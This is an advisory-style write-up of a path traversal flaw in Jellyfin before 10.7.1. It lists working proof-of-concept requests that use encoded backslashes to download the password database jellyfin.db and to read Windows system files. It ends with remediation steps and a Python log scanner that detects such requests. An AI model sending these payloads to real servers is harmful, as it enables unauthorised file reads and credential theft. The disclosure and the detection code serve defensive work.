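Vulnerability overview:
Jellyfin is a free-software media system for controlling and managing media and streaming. It is an alternative to Emby and Plex, and serves media from a dedicated server to end-user devices through multiple applications. Jellyfin is descended from Emby 3.5.2 and was ported to the .NET Core framework to enable full cross-platform support.
Affected versions:
Jellyfin < 10.7.1
Vulnerability reproduction:
Exploit PoC:
Download jellyfin.db, which contains passwords, from the server: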
/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/?
Unauthorized reading of Windows files:
GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/
GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Read the hosts file:
/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3/
Read the database file containing passwords:
/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Remediation advice:
    1. Update to version 10.7.1.
    2. Add protection rules on the web application firewall.
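To support the WAF recommendation above, the following added example (not from the original write-up or the Jellyfin project) flags access-log requests whose path contains a `..` segment once percent-encoding is decoded, treating both `/` and `\` as separators. It goes beyond the exact requests on this page by decoding repeatedly, so nested encoding and lowercase `%5c` are also caught. The log format, sample lines and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

MAX_DECODE_ROUNDS = 3  # assumption: unwraps nested percent-encoding
LOG_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(path):
    """Percent-decode until stable, so %5C and %5c both become a backslash."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(request_target):
    """True if a path segment (split on slash or backslash) is '..' after decoding."""
    path = fully_decode(urlsplit(request_target).path)
    return ".." in re.split(r"[\\/]+", path)

def scan(lines):
    """Return (target, status) for every logged request that is a traversal."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if m and is_traversal(m["target"]):
            hits.append((m["target"], int(m["status"])))
    return hits

# Constructed access-log lines (not captured traffic); paths modeled on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2021:10:00:01 +0000] "GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1" 200 1048576',
    '192.0.2.10 - - [01/Apr/2021:10:00:05 +0000] "GET /Audio/anything/hls/..%5c..%5cWindows%5cwin.ini/stream.aac/ HTTP/1.1" 404 0',
    '192.0.2.22 - - [01/Apr/2021:10:01:00 +0000] "GET /Audio/abc123/hls/my..mix/stream.mp3 HTTP/1.1" 200 4096',
    '192.0.2.22 - - [01/Apr/2021:10:01:09 +0000] "GET /web/index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for target, status in scan(SAMPLE_LOG):
        # A 2xx status on a hit means the server answered the traversal request.
        print(status, target)
```

Matching whole segments rather than the substring `..` keeps names such as `my..mix` from raising false positives.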
Reference link: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/